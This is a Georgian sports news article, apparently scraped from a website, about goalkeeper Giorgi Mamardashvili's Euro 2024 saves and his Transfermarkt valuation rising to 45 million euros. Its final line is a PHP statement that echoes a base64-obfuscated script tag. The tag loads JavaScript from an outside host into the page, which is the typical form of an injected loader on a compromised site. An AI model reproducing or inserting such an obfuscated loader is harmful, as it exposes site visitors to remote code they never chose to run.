celsiusi
ავერსი საქკაბელი

 ევრო 2024-ზე საქართველოს ეროვნულმა ნაკრებმა ჯგუფური ეტაპი გადალახა, რაც დებიუტანტი გუნდისთვის ფენომენალური შედეგია. ამ ყველაფრის მიღწევაში კი ერთ-ერთი უდიდესი როლი საქართველოს ნაკრების კარის დარაჯმა გიორგი მამარდაშვილმა შეასრულა, რომელმაც 4 თამაშში 29 ბურთი მოიგერია და მხოლოდ სამი მოგერიებით ჩამორჩა იგორ აკინფეევის - 2008 წლის შედეგს ერთ ჩემპიონატზე მოგერიებული ბურთების რაოდენობით.


ამ შედეგით მან პირველი ადგილი დაიკავა გასულ ევროპის ჩემპიონატზე და მთელი 11 "სეივით" გაასწრო მეორე ადგილზე გასულ ნიდერლანდების გოლკიპერ ბარტ ვერბრუგენს.

მამარდაშვილის პერფორმანსმა შედეგი გამოიღო, რაც სატრანსფერო პორტალ Transfermarkt-ზეც აისახა. საიტზე შედეგები 21 მარტს განახლდა, რომლის მიხედვითაც ქართველი მეკარის ღირებულება 35 მილიონ ევროს აღწევდა.

ახლა კი, მონაცემები კიდევ ერთხელ განახლდა, რომლის მიხედვითაც გიორგის ღირებულება 45 მილიონი ევროა, რითაც მსოფლიოს უძვირესი მეკარის ტიტულს პორტუგალიის კარის დარაჯ დიოგო კოშტასთან ერთად იყოფს.

შეგახსენებთ, რომ გიორგი მამარდაშვილის გადაბირებით ინგლისური “ნიუკასლი” და ესპანური მადრიდის “ატლეტიკო” ინტერესდებიან, თუმცა მაღალი სატრანსფერო ფასიდან გამომდინარე შესაძლოა ქართველმა მეკარემ ადგილსამყოფელი არ შეიცვალოს.

317
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");